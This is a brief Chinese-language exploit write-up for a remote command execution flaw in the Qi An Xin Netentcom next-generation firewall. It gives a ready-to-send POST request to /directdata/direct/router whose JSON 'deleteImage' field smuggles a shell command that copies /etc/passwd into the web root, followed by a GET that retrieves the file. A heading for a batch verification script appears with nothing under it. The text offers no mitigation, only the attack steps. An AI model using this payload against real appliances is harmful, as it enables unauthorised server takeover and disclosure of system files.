奇安信 网康下一代防火墙 RCE 可直接getshell

0x01 阅读须知

0x02 漏洞描述

网康下一代防火墙(NGFW)是一款可以全面应对应用层威胁的高性能防火墙。通过深入洞察网络流量中的用户、应用和内容，并借助全新的高性能单路径异构并行处理引擎，NGFW能够为用户提供有效的应用层一体化安全防护，帮助用户安全地开展业务并简化用户的网络安全架构。

存在远程命令执行，漏洞攻击者可以获取服务器权限。

0x03 漏洞复现

1、进入登录页面抓包

2、构造数据包

变更发包方式：POST /directdata/direct/router HTTP/1.1

添加POST数据：

{\"action\":\"SSLVPN_Resource\",\"method\":\"deleteImage\",\"data\":[{\"data\":[\"/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test.txt\"]}],\"type\":\"rpc\",\"tid\":17,\"f8839p7rqtj\":\"=\"}

3、继续 构造数据包

变更发包方式：GET /test.txt HTTP/1.1

批量验证脚本